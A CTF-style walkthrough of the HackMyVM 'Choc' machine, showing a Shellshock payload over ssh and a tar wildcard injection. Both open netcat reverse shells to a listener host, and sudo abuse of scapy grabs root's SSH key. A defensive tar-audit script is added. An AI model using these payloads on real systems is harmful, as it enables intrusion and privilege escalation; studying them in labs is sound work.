HackMyVm Choc Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Choc


Scan all ports with Nmap; only 21 and 22 are open.

nmap -sV -sC -p- -oN ports.log 192.168.56.100


Log in to FTP as anonymous and get id_rsa.


Try ssh and get the user name "carl".


Try to log in over ssh as "carl" with the id_rsa; the VM displays a message and quits.


Try the bash Shellshock exploit through ssh. Listen on port 1234 in one terminal, and log in over ssh in another terminal.

ssh carl@192.168.56.100 -i id_rsa '() { :;}; nc 192.168.56.150 1234 -e /bin/bash'


Use Python's pty module to get an interactive shell.

python3 -c 'import pty;pty.spawn("/bin/bash")'


There are 3 users in the home folder.


In torki's home, find secret_garden/diary.txt.


There is a backup.sh file, which we cannot read yet.

Search for files belonging to user torki; this finds /tmp/backup_home.tgz.

find / -user torki 2>/dev/null


Extract it with tar -xvf; it contains diary.txt.

Now we can use the tar wildcard exploit.

Listen on port 2234 in one terminal, and create 3 files in /home/torki/secret_garden.

Wait 1 minute, and we get a reverse shell.

echo '' > secret_garden/--checkpoint=1
echo '' > 'secret_garden/--checkpoint-action=exec=sh pwn.sh'
echo 'nc 192.168.56.150 2234 -e /bin/bash' > secret_garden/pwn.sh
chmod +x secret_garden/pwn.sh
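
backup.sh cannot be read at this stage, so the following is an added example, not part of the original walkthrough or the VM's script. It assumes the backup job runs tar with an unquoted * inside secret_garden, and shows how a defender can flag option-like file names and archive the directory without a glob. The function names are hypothetical.

```shell
#!/bin/sh
# Added defensive example. Function names are hypothetical, and the
# vulnerable pattern assumed here is: cd DIR && tar -czf ARCHIVE *

# Print entries of DIR whose names start with '-'. An unquoted '*' run
# inside DIR expands to these names, and tar parses them as options.
find_option_like_names() {
    for f in "$1"/-*; do
        # An unmatched glob stays literal; skip it.
        [ -e "$f" ] || [ -L "$f" ] || continue
        printf '%s\n' "${f##*/}"
    done
}

# Return 1 and report on stderr if DIR holds option-like names.
audit_backup_dir() {
    names=$(find_option_like_names "$1")
    if [ -n "$names" ]; then
        printf 'option-like file names in %s:\n%s\n' "$1" "$names" >&2
        return 1
    fi
    return 0
}

# Archive SRC into OUT without a shell glob: tar walks SRC itself, so
# every name is stored as ./NAME and never reaches the option parser.
safe_backup() {
    tar -czf "$2" -C "$1" .
}

# Usage: sh audit.sh DIR [OUT.tgz]
if [ -n "${1:-}" ]; then
    audit_backup_dir "$1" || echo "review these files before trusting DIR" >&2
    if [ -n "${2:-}" ]; then safe_backup "$1" "$2"; fi
fi
```

If a glob has to stay in the script, writing it as ./* or placing -- before it has the same effect of keeping file names out of tar's option parsing.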


In /home/torki/.ssh, get id_rsa; now we can log in over ssh as torki.


Check sudo -l; we can escalate to user sarah.


Run sudo -u sarah /usr/bin/scapy, then in scapy's interactive mode run 'import pty;pty.spawn("/bin/bash")'.


Check sudo -l again.


Now we can get /root/.ssh/id_rsa.


And finally get root.
